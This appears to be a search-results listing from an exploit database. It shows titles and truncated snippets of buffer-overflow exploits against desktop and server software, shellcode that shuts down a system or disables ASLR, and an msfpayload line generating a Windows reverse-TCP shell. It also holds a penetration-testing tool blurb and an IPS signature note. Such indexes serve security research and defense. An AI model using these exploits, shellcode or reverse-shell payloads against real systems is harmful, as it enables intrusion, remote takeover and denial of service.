7261 matches found
Panda Global Protection 2010 local Dos (unfiltered wcscpy())
No description provided by source. include windows.h include string.h include ddk/ntapi.h include tlhelp32.h define SystemModuleInfo 11 / Program : Panda Global Protection 2010 3.01.00 Homepage : http://www.pandasecurity.com Discovery : 2010/04/09 Author Contacted : 2010/07/15 Status of vuln :...
DVD X Player 5.5.0 Pro / Standard - Universal Exploit, DEP+ASLR Bypass.
No description provided by source. // Author: sickness // Take a look at mona.py : awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ // ----------------------------------------------------------- // Exploit Title: DVD X Player 5.5...
Novell eDirectory <= 9.0 DHost Remote Buffer Overflow Exploit
No description provided by source. / . \ \ \ \ | | / | | | | \ / / /\ \ / \ | | \ / | |/ | |/ / \ / \ | / \ // | Y / ^ /\ | //\ \ /| / / || /\ | \ | \ / / / / 30\10\06 / || / / mm. dM8 YMMMb. dMM8 YMMMMb dMMM' YMMMb dMMMP There are doors I have yet to open YMMM MMM' windows I have yet...
Adobe Reader PDF LibTiff Integer Overflow Code Execution
No description provided by source. doc=''' Title: Adobe PDF LibTiff Integer Overflow Code Execution. Product: Adobe Acrobat Reader Version: =8.3.0, =9.3.0 CVE: 2010-0188 Author: villy villys777 at gmail.com Site: http://bugix-security.blogspot.com/ Tested : succesfully tested on Adobe Reader...
Chasys Media Player 1.1 - (.pls) Local Stack overflow Exploit
No description provided by source. usage: exploit.py print print Chasys Media Playerpls File Local Stack overflow Exploit\n print Founder: zAx my friend : print Exploited by : His0k4 print Tested on: Windows XP Pro SP2 Fr\n print Good news : The program didn't crash after running the exploit :...
BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/python BisonFTP Server =v3.5 Remote Buffer Overflow Exploit Newer version's not tested, maybe vulnerable too written by localh0t Date: 10/08/11 Contact: [email protected] Follow: @mattdch www.localh0t.com.ar | www.mfsec.com.ar Thanks to: Pr0zac,...
VUPlayer 2.49 - .ASX File (HREF) Local Buffer Overflow Exploit (1)
No description provided by source. !/usr/bin/perl intro; does not need a thread method shellcode to run as best as can. seh work great too! win32exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode =...
HP Photo Creative 2.x audio.Record.1 ActiveX Control Remote Stack Based Buffer Overflow
No description provided by source. !-- HP Photo Creative v 2.x audio.Record.1 ActiveX Control ContentMan.dll 1.0.0.4272 Remote Stack Based Buffer Overflow poc by rgod tested against Windows Vista / IE 7 download url:...
linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes
No description provided by source. / linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik [email protected] / char shellcode = \x31\xc9 // xor %ecx,%ecx \x51 // push %ecx \x68\x6e\x64\x6f\x6d // push $0x6d6f646e \x68\x2f\x75\x72\x61 // push $0x6172752f...
Free MP3 CD Ripper 1.1 - DEP Bypass Exploit
No description provided by source. !/usr/bin/python +Exploit Title: Free MP3 CD Ripper 1.1 Universal DEP Bypass Exploit +Date: 27\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.brothersoft.com/free-mp3-cd-ripper-84543.html +Found/Initial Exploit:...
mpg123 pre0.59s Invalid MP3 Header Memory Corruption Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6593/info A memory corruption vulnerability has been reported for mpg123 that may result in code execution. The vulnerability exists when mpg123 is used to play certain MP3 files. Specifically, when playing MP3 files with...
Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes
No description provided by source. include stdio.h char shellcode = \x31\xC9 //xor ecx, ecx \x64\x8B\x71\x30 //mov esi, fs:ecx+0x30 \x8B\x76\x0C //mov esi, esi+0x0C \x8B\x76\x1C //mov esi, esi+0x1c \x8B\x06 //mov eax, esi \x8B\x68\x08 //mov ebp, eax+0x08 \x68\x11\x11\x11\x11 //push 0x11111111...
Linux/ARM - Disable ASLR Security - 102 bytes
No description provided by source. / Title: Linux/ARM - Disable ASLR Security - 102 bytes Date: 2010-06-20 Tested: Linux ARM9 2.6.28-6-versatile Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Database of shellcodes http://www.shell-storm.org/shellcode/...
FreeFloat FTP 1.0 - DEP Bypass with ROP
No description provided by source. !usr/bin/python Exploit title: FreeFloat ftp 1.0 DEP bypass with ROP Exploit Author: negux POC: http://www.exploit-db.com/exploits/24479/ Tested on : Windows XP SP 3 Spanish import socket,struct msfpayload windows/shellreversetcp LHOST=192.168.1.117 LPORT=443 R ...
Maligno - Penetration Testing Tool that Serves Metasploit Payloads
Maligno is an open source penetration testing tool that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission. Changelog: Metasploit multi-host support, socks4a server...
linux/x86 shutdown -h now Shellcode - 56 bytes
/ ; Title: shutdown -h now Shellcode - 56 bytes ; Date: 2014-06-27 ; Platform: linux/x86 ; Author: Osanda Malith Jayathissa @OsandaMalith Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax 8048062: 31 d2 xor edx,edx 8048064: 50 push eax 8048065: 66 68 2d 68 pushw 0x682d 8048069: ...
linux/x86 shutdown -h now x86_64 Shellcode - 65 bytes
/ ; Title: shutdown -h now x8664 Shellcode - 65 bytes ; Platform: linux/x8664 ; Date: 2014-06-27 ; Author: Osanda Malith Jayathissa @OsandaMalith section .text global start start: xor rax, rax xor rdx, rdx push rax push byte 0x77 push word 0x6f6e ; now mov rbx, rsp push rax push word 0x682d ;-h m...
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
Linux/x86-64 - shutdown -h now Shellcode 65 bytes. Shellcode exploit for Linuxx86-64 platform / ; Title: shutdown -h now x8664 Shellcode - 65 bytes ; Platform: linux/x8664 ; Date: 2014-06-27 ; Author: Osanda Malith Jayathissa @OsandaMalith section .text global start start: xor rax, rax xor rdx, r...
Linux/x86 - shutdown -h now Shellcode (56 bytes)
Linux/x86 - shutdown -h now Shellcode 56 bytes. Shellcode exploit for Linuxx86 platform / ; Title: shutdown -h now Shellcode - 56 bytes ; Date: 2014-06-27 ; Platform: linux/x86 ; Author: Osanda Malith Jayathissa @OsandaMalith Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax...
PDF Containing Encrypted Data
PDF files may include encrypted data. A remote attacker may use such encrypted data inside PDF files to hide attacks against various PDF vulnerabilities, in order to evade IPS inspection. There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it m...